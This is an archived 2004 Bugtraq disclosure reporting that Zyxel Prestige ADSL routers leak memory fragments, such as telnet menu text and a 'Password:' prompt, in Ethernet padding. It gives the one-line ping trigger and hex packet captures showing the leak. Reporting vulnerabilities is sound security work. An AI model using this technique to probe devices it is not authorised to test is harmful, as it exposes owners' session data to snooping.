lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1076157724.2533.20.camel@station>
Date: Sat, 07 Feb 2004 13:42:05 +0100
From: DiSToAGe <distoage@...i.net>
To: bugtraq@...urityfocus.com
Subject: [Fwd: zyxel prestige ethernet information leakage]


I sent a mail to the vendor, without response , so here it is.

In the exemple here you can see informations about the telnet interface
previously connected to.

Note the problem do not only exist with icmp packet but seems to be in
ACK packet on TCP too. I don't know if the problem exist only on the LAN
side or if the bad padding is added on the ADSL side too, so
informations can be seen by remote hosts.

I don't know if other model are vulnerable too.

> 
> Hi,
> 
> Some ethernet interface have security problems : information leakage
> please see CERT vulnerability #412115
> 
> http://www.kb.cert.org/vuls/id/412115
> 
> It say that Zyxel devices with ZyNOS v.2.50 to v.3.60 are not vulnerable
> but it isn't true.
> 
> Here you can see report with a Zyxel prestige 650R-11 ADSL router.
> 
> 		Name: Router
>                 Routing: IP
>                 ZyNOS F/W Version: V3.40(ES.5) | 2/10/2003
>                 ADSL Chipset Vendor:  Alcatel, Version  3.9.122
>                 Standard: Multi-Mode
> 
> send icmp packet with less data than normal so remote interface padd
> with data to complete the frame :
> 
> ping -s 0 router
> 
> Here is the replies, you can see other portion of memory on replies by
> router :
> 
> 10:15:42.904088 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
> 0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
> 10:15:43.918189 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae2 0000 fe01 aeaa c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f1 e80c 0002 6377 437a        ............cwCz
> 0x0020   5010 03ff 434b 0000 27ff fc05 fffe             P...CK..'.....
> 10:15:44.928354 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae3 0000 fe01 aea9 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f0 e80c 0003 6377 437a        ............cwCz
> 0x0020   5010 0400 434a 0000 0204 0200 c0a8             P...CJ........
> 10:15:45.938513 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
> 0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
> 10:15:46.948675 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae5 0000 fe01 aea7 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ee e80c 0005 6377 437c        ............cwC|
> 0x0020   5010 03fe 4349 0000 0204 0200 c0a8             P...CI........
> 10:15:47.958838 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae6 0000 fe01 aea6 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ed e80c 0006 6377 437c        ............cwC|
> 0x0020   5010 0400 4347 0000 75dd 6642 c0a8             P...CG..u.fB..
> 
> 
> 
> 



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ